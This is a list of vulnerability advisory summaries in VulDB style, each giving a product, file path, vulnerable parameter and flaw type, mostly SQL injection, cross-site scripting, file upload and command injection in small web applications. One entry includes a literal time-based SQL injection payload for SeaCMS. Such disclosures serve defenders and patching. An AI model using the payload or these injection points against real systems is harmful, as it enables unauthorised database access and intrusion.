A vulnerability was found in itsourcecode Farm Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /quarantine.php?id=3. The manipulation of the argument pigno/breed/reason leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-270241 was assigned to this vulnerability. NOTE: Original submission mentioned parameter pigno only but the VulDB data analysis team determined two additional parameters to be affected as well.
A vulnerability classified as critical was found in linlinjava litemall up to 1.8.0. Affected by this vulnerability is an unknown functionality of the file AdminGoodscontroller.java. The manipulation of the argument goodsId/goodsSn/name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-270235.
A vulnerability was found in ORIPA up to 1.72. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file src/main/java/oripa/persistence/doc/loader/LoaderXML.java. The manipulation leads to deserialization. The attack can be launched remotely. Upgrading to version 1.80 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-270169 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Home Owners Collection Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /classes/Master.php?f=delete_category. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-270168.
A vulnerability was found in SourceCodester Home Owners Collection Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /classes/Users.php?f=save. The manipulation of the argument img leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-270167.
A vulnerability has been found in Hitout Carsale 1.0 and classified as critical. This vulnerability affects unknown code of the file OrderController.java. The manipulation of the argument orderBy leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-270166 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Medicine Tracker System 1.0. This vulnerability affects unknown code of the file /classes/Master.php?f=save_medicine. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-270010 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Medicine Tracker System 1.0. This affects an unknown part of the file /classes/Users.php?f=register_user. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-270009 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Simple Online Bidding System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/ajax.php?action=delete_user. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-270008.
A vulnerability was found in SeaCMS 12.9. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /js/player/dmplayer/dmku/?ac=edit. The manipulation of the argument cid with the input (select(0)from(select(sleep(10)))v) leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-270007.
A vulnerability classified as problematic was found in Ingenico Estate Manager 2023. Affected by this vulnerability is an unknown functionality of the file /emgui/rest/preferences/PREF_HOME_PAGE/sponsor/3/ of the component New Widget Handler. The manipulation of the argument URL leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-270001 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in Parsec Automation TrakSYS 11.x.x. Affected is an unknown function of the file TS/export/contentpage of the component Export Page. The manipulation of the argument ID leads to direct request. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-270000. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in lahirudanushka School Management System 1.0.0/1.0.1 and classified as problematic. This issue affects some unknown processing of the file /subject.php of the component Subject Page. The manipulation of the argument Subject Title/Sybillus Details leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-269807.
A vulnerability has been found in itsourcecode Online Food Ordering System up to 1.0 and classified as critical. This vulnerability affects unknown code of the file /addproduct.php. The manipulation of the argument photo leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-269806 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in itsourcecode Tailoring Management System 1.0. This affects an unknown part of the file customeradd.php. The manipulation of the argument fullname/address/phonenumber/sex/email/city/comment leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-269805 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in itsourcecode Pool of Bethesda Online Reservation System 1.0. Affected by this issue is some unknown functionality of the file controller.php. The manipulation of the argument rmtype_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-269804.
A vulnerability classified as problematic was found in LabVantage LIMS 2017. Affected by this vulnerability is an unknown functionality of the file /labvantage/rc?command=file&amp;file=WEB-OPAL/pagetypes/bulletins/sendbulletin.jsp of the component POST Request Handler. The manipulation of the argument bulletinbody leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-269803.
A vulnerability classified as problematic has been found in LabVantage LIMS 2017. Affected is an unknown function of the file /labvantage/rc?command=page&amp;sdcid=LV_ReagentLot of the component POST Request Handler. The manipulation of the argument mode leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-269802 is the identifier assigned to this vulnerability.
A vulnerability was found in LabVantage LIMS 2017. It has been rated as problematic. This issue affects some unknown processing of the file /labvantage/rc?command=page of the component POST Request Handler. The manipulation of the argument param1 leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-269801 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in LabVantage LIMS 2017. It has been declared as problematic. This vulnerability affects unknown code of the file /labvantage/rc?command=file&amp;file=WEB-CORE/elements/files/filesembedded.jsp of the component POST Request Handler. The manipulation of the argument sdcid/keyid1/keyid2/keyid3 leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-269800. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Genexis Tilgin Fiber Home Gateway HG1522 CSx000-01_09_01_12. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /status/product_info/. The manipulation of the argument product_info leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-269755. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in ZKTeco ZKBio CVSecurity V5000 4.1.0. This affects an unknown part of the component Push Configuration Section. The manipulation of the argument Configuration Name leads to cross site scripting. It is possible to initiate the attack remotely. The identifier VDB-269733 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in itsourcecode Simple Online Hotel Reservation System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file index.php. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-269620.
A vulnerability was found in SourceCodester Simple Online Bidding System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/ajax.php?action=save_settings. The manipulation of the argument img leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-269493 was assigned to this vulnerability.
A vulnerability was found in lahirudanushka School Management System 1.0.0/1.0.1 and classified as critical. Affected by this issue is some unknown functionality of the file examresults-par.php of the component Exam Results Page. The manipulation of the argument sid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-269492.
A vulnerability has been found in lahirudanushka School Management System 1.0.0/1.0.1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file subject.php of the component Subject Page. The manipulation of the argument update leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-269491.
A vulnerability, which was classified as critical, was found in lahirudanushka School Management System 1.0.0/1.0.1. Affected is an unknown function of the file student.php of the component Student Page. The manipulation of the argument update leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-269490 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in lahirudanushka School Management System 1.0.0/1.0.1. This issue affects some unknown processing of the file teacher.php of the component Teacher Page. The manipulation of the argument update leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-269489 was assigned to this vulnerability.
A vulnerability classified as critical was found in lahirudanushka School Management System 1.0.0/1.0.1. This vulnerability affects unknown code of the file parent.php of the component Parent Page. The manipulation of the argument update leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-269488.
A vulnerability classified as critical has been found in lahirudanushka School Management System 1.0.0/1.0.1. This affects an unknown part of the file /attendancelist.php of the component Attendance Report Page. The manipulation of the argument aid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-269487.
A vulnerability, which was classified as critical, has been found in lahirudanushka School Management System 1.0.0/1.0.1. Affected by this issue is some unknown functionality of the file login.php of the component Login Page. The manipulation of the argument email leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-269480.
A vulnerability classified as problematic was found in SourceCodester Service Provider Management System 1.0. Affected by this vulnerability is an unknown functionality of the file system_info/index.php of the component System Info Page. The manipulation of the argument System Name/System Short Name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-269479.
A vulnerability classified as critical has been found in Pear Admin Boot up to 2.0.2. Affected is an unknown function of the file /system/dictData/loadDictItem. The manipulation leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-269478 is the identifier assigned to this vulnerability.
A vulnerability was found in itsourcecode Online Food Ordering System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /purchase.php. The manipulation of the argument customer leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-269420.
A vulnerability has been found in Zorlan SkyCaiji up to 2.8 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Task Handler. The manipulation of the argument onerror leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-269419.
A vulnerability, which was classified as problematic, was found in playSMS 1.4.3. Affected is an unknown function of the file /index.php?app=main&amp;inc=feature_phonebook&amp;op=phonebook_list of the component New Phonebook Handler. The manipulation of the argument name/email leads to basic cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-269418 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in itsourcecode Vehicle Management System 1.0. Affected by this issue is some unknown functionality of the file busprofile.php. The manipulation of the argument busid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-269282 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Food Ordering Management System 1.0. Affected by this vulnerability is an unknown functionality of the file user-router.php. The manipulation of the argument 1_verified leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-269281 was assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Food Ordering Management System 1.0. Affected is an unknown function of the file add-users.php. The manipulation of the argument contact leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-269280.
A vulnerability was found in SourceCodester Food Ordering Management System up to 1.0. It has been rated as critical. This issue affects some unknown processing of the file view-ticket-admin.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-269279.
A vulnerability was found in SourceCodester Food Ordering Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file add-item.php. The manipulation of the argument price leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-269278 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Food Ordering Management System up to 1.0. It has been classified as critical. This affects an unknown part of the file login.php of the component Login Panel. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-269277 was assigned to this vulnerability.
A vulnerability was found in itsourcecode Banking Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file admin_class.php. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-269168.
A vulnerability has been found in itsourcecode Tailoring Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file orderadd.php. The manipulation of the argument customer leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-269167.
A vulnerability, which was classified as critical, was found in itsourcecode Tailoring Management System 1.0. Affected is an unknown function of the file editmeasurement.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-269166 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in itsourcecode Vehicle Management System 1.0. This issue affects some unknown processing of the file driverprofile.php. The manipulation of the argument driverid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-269165 was assigned to this vulnerability.
A vulnerability classified as critical was found in itsourcecode Loan Management System 1.0. This vulnerability affects unknown code of the file login.php of the component Login Page. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-269164.
A vulnerability classified as critical has been found in itsourcecode Student Management System 1.0. This affects an unknown part of the file login.php of the component Login Page. The manipulation of the argument user leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-269163.
A vulnerability was found in itsourcecode Farm Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-269162 is the identifier assigned to this vulnerability.
A vulnerability was found in Parsec Automation TrackSYS 11.x.x and classified as problematic. This issue affects some unknown processing of the file /TS/export/pagedefinition. The manipulation of the argument ID leads to direct request. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-269159. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Ruijie RG-UAC 1.0 and classified as critical. This vulnerability affects unknown code of the file /view/vpn/autovpn/sub_commit.php. The manipulation of the argument key leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-269158 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in Ruijie RG-UAC 1.0. This affects an unknown part of the file /view/userAuthentication/SSO/commit.php. The manipulation of the argument ad_log_name leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-269157 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in Ruijie RG-UAC 1.0. Affected by this vulnerability is an unknown functionality of the file /view/systemConfig/reboot/reboot_commit.php. The manipulation of the argument servicename leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-269155. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in EZ-Suite EZ-Partner 5. Affected is an unknown function of the component Forgot Password Handler. The manipulation leads to basic cross site scripting. It is possible to launch the attack remotely. VDB-269154 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in LabVantage LIMS 2017. It has been rated as problematic. This issue affects some unknown processing of the file /labvantage/rc?command=page&amp;page=LV_ViewSampleSpec&amp;oosonly=Y&amp;_sdialog=Y. The manipulation of the argument sdcid/keyid1 leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-269153 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in LabVantage LIMS 2017. It has been declared as problematic. This vulnerability affects unknown code of the file /labvantage/rc?command=file&amp;file=WEB-CORE/elements/files/filesembedded.jsp&amp;size=32. The manipulation of the argument height/width leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-269152. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in spa-cartcms 1.9.0.6. Affected is an unknown function of the file /login of the component Username Handler. The manipulation of the argument email leads to observable behavioral discrepancy. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-268896.
A vulnerability, which was classified as problematic, has been found in spa-cartcms 1.9.0.6. This issue affects some unknown processing of the file /checkout of the component Checkout Page. The manipulation of the argument quantity with the input -10 leads to enforcement of behavioral workflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268895.
A vulnerability, which was classified as critical, has been found in itsourcecode Simple Online Hotel Reservation System 1.0. Affected by this issue is some unknown functionality of the file edit_room.php. The manipulation of the argument photo leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-268868.
A vulnerability classified as critical was found in itsourcecode Simple Online Hotel Reservation System 1.0. Affected by this vulnerability is an unknown functionality of the file add_room.php. The manipulation of the argument photo leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268867.
A vulnerability classified as critical has been found in itsourcecode Monbela Tourist Inn Online Reservation System up to 1.0. Affected is an unknown function of the file controller.php. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-268866 is the identifier assigned to this vulnerability.
A vulnerability was found in itsourcecode Monbela Tourist Inn Online Reservation System 1.0. It has been rated as critical. This issue affects some unknown processing of the file login.php. The manipulation of the argument email leads to sql injection. The attack may be initiated remotely. The identifier VDB-268865 was assigned to this vulnerability.
A vulnerability classified as critical was found in itsourcecode Pool of Bethesda Online Reservation System 1.0. This vulnerability affects unknown code of the file index.php. The manipulation of the argument log_email leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-268858 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in itsourcecode Pool of Bethesda Online Reservation System 1.0. This affects an unknown part of the file login.php. The manipulation of the argument email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268857 was assigned to this vulnerability.
A vulnerability was found in itsourcecode Magbanua Beach Resort Online Reservation System up to 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file controller.php. The manipulation of the argument image leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-268856.
A vulnerability was found in itsourcecode Tailoring Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file addmeasurement.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268855.
A vulnerability was found in Genexis Tilgin Home Gateway 322_AS0500-03_05_13_05. It has been classified as problematic. Affected is an unknown function of the file /vood/cgi-bin/vood_view.cgi?act=index&amp;lang=EN# of the component Login. The manipulation of the argument errmsg leads to basic cross site scripting. It is possible to launch the attack remotely. VDB-268854 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in PHPVibe 11.0.46. Affected is an unknown function of the file /app/uploading/upload-mp3.php of the component Media Upload Page. The manipulation of the argument file leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-268824. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in PHPVibe 11.0.46. This issue affects some unknown processing of the file functionalities.global.php of the component Global Options Page. The manipulation of the argument site-logo-text leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268823. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in Intelbras InControl 2.21.56. This vulnerability affects unknown code of the component incontrolWebcam Service. The manipulation leads to unquoted search path. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. VDB-268822 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure and plans to provide a solution within the next few weeks.
A vulnerability classified as critical was found in SourceCodester Music Class Enrollment System 1.0. Affected by this vulnerability is an unknown functionality of the file /mces/?p=class/view_class. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268795.
A vulnerability classified as critical has been found in SourceCodester Best House Rental Management System 1.0. Affected is an unknown function of the file payment_report.php. The manipulation of the argument month_of leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-268794 is the identifier assigned to this vulnerability.
A vulnerability was found in itsourcecode Bakery Online Ordering System 1.0. It has been rated as critical. This issue affects some unknown processing of the file index.php. The manipulation of the argument user_email leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268793 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in Ingenico Estate Manager 2023. This issue affects some unknown processing of the file /emgui/rest/ums/messages of the component News Feed. The manipulation of the argument message leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268787. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in LabVantage LIMS 2017. This affects an unknown part of the file /labvantage/rc?command=page&amp;page=SampleHistoricalList&amp;_iframename=list&amp;__crc=crc_1701669816260. The manipulation of the argument height/width leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268785 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in nasirkhan Laravel Starter up to 11.8.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /forgot-password of the component Password Reset Handler. The manipulation of the argument Email leads to observable response discrepancy. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-268784. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in itsourcecode Real Estate Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file property-detail.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-268766 is the identifier assigned to this vulnerability.
A vulnerability was found in itsourcecode Gym Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file manage_user.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268765 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in Feng Office 3.11.1.2. Affected is an unknown function of the component Workspaces. The manipulation of the argument dim leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-268752.
A vulnerability, which was classified as critical, has been found in itsourcecode Online Laundry Management System 1.0. Affected by this issue is some unknown functionality of the file admin_class.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-268724.
A vulnerability classified as critical was found in itsourcecode Online House Rental System 1.0. Affected by this vulnerability is an unknown functionality of the file manage_user.php. The manipulation of the argument month_of leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268723.
A vulnerability classified as critical has been found in itsourcecode Document Management System 1.0. Affected is an unknown function of the file edithis.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-268722 is the identifier assigned to this vulnerability.
A vulnerability was found in itsourcecode Online Book Store 1.0. It has been rated as critical. This issue affects some unknown processing of the file admin_delete.php. The manipulation of the argument bookisbn leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268721 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in itsourcecode Online Book Store up to 1.0. Affected is an unknown function of the file /edit_book.php. The manipulation of the argument image leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-268698 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in Netentsec NS-ASG Application Security Gateway 6.3. This affects an unknown part of the file /protocol/iscgwtunnel/deleteiscgwrouteconf.php. The manipulation of the argument messagecontent leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268695. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in ZKTeco ZKBio CVSecurity V5000 4.1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Summer Schedule Handler. The manipulation of the argument Schedule Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-268694 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in ZKTeco ZKBio CVSecurity V5000 4.1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the component Department Section. The manipulation of the argument Department Name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268693 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Guangdong Baolun Electronics IP Network Broadcasting Service Platform 2.0. It has been classified as critical. Affected is an unknown function of the file /api/v2/maps. The manipulation of the argument orderColumn leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-268692. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in SourceCodester Best Online News Portal 1.0. This affects an unknown part of the file /admin/index.php. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268461 was assigned to this vulnerability.
A vulnerability was found in itsourcecode Online Bookstore 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file book.php. The manipulation of the argument bookisbn leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-268460.
A vulnerability was found in itsourcecode Online Bookstore 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file bookPerPub.php. The manipulation of the argument pubid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268459.
A vulnerability was found in itsourcecode Online House Rental System 1.0. It has been classified as critical. Affected is an unknown function of the file manage_user.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-268458 is the identifier assigned to this vulnerability.
A vulnerability was found in itsourcecode Payroll Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file print_payroll.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-268142 is the identifier assigned to this vulnerability.
A vulnerability has been found in SourceCodester Employee and Visitor Gate Pass Logging System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /classes/Master.php?f=log_visitor. The manipulation of the argument name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268141 was assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Online Eyewear Shop 1.0. This vulnerability affects unknown code of the file manage_product.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-268138 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Cab Management System 1.0. This affects an unknown part of the file /cms/classes/Users.php?f=delete_client. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268137 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in playSMS up to 1.4.7. Affected is an unknown function of the file /index.php?app=main&amp;inc=feature_schedule&amp;op=list of the component SMS Schedule Handler. The manipulation of the argument name/message leads to basic cross site scripting. It is possible to launch the attack remotely. Upgrading to version 1.4.8 is able to address this issue. The name of the patch is 7a88920f6b536c6a91512e739bcb4e8adefeed2b. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-267912. NOTE: The code maintainer was contacted early about this disclosure and was eager to prepare a fix as quickly as possible.
A vulnerability classified as problematic was found in smallweigit Avue up to 3.4.4. Affected by this vulnerability is an unknown functionality of the component avueUeditor. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-267895. NOTE: The code maintainer explains, that "rich text is no longer maintained".
A vulnerability was found in SourceCodester Vehicle Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file updatebill.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-267458 is the identifier assigned to this vulnerability.
